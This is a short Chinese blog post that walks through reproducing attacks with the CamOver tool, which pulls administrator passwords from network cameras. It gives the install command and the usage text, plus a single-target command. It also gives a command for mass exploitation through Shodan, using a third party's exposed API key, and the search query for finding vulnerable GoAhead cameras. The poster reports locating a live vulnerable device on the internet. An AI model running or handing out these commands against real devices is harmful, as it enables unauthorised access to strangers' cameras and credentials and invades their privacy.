【漏洞】Camover摄像头利用(复现)

Camover摄像头利用

参考链接:https://mp.weixin.qq.com/s/sw4wNJisQ-uV0XoHLSfKKw
项目地址:https://github.com/EntySec/CamOver

安装camover

pip3 install git+https://github.com/EntySec/CamOver

camover使用指南

使用方法: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] 。
               [--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES]。

CamOver是一个利用摄像机的工具,可以披露网络摄像机的管理密码。
摄像机管理密码。

可选参数。
  -h, --help 显示此帮助信息并退出
  -t, --线程 使用线程以最快速度工作。
  -o OUTPUT, --output OUTPUT
                        将结果输出到文件。
  -i INPUT, --input INPUT
                        输入地址的文件。
  -a ADDRESS, --address ADDRESS
                        单个地址。
  --shodan SHODAN Shodan API密钥,用于通过互联网利用设备。
                        互联网上的设备。
  --zoomeye ZOOMEYE ZoomEye API密钥,用于利用互联网上的设备。
                        互联网上的设备。
  --p PAGES, --pages PAGES
                        你想从ZoomEye获得的页面数量。

使用camover

单点攻击

camover -a 192.168.101.2

这是里是失败时的样子

通过网络远程攻击

camover可以使用 Shodan 搜索引擎来搜索并攻击网络上的摄像头,使用 -t 参数来设置多线程数量以获得更好的性能:
camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

这个api是作者的,竟然能用,互联网共享精神,respect!

搜寻原理

通过翻看文件,发现查找的关键词
query='GoAhead 5ccc069c403ebaf9f0171e9517f40e41'

在zoomeye搜索,也能得到同样的效果(刚买的fofa搜不到,差评)

然后翻看代码发现,只要是用户名不是admin的都是非脆弱的(😓)

然后通过撞大运的方式发现一个用户名是admin的地址


posted @ 2022-03-04 22:32  NanHe7  阅读(2134)  评论(1编辑  收藏  举报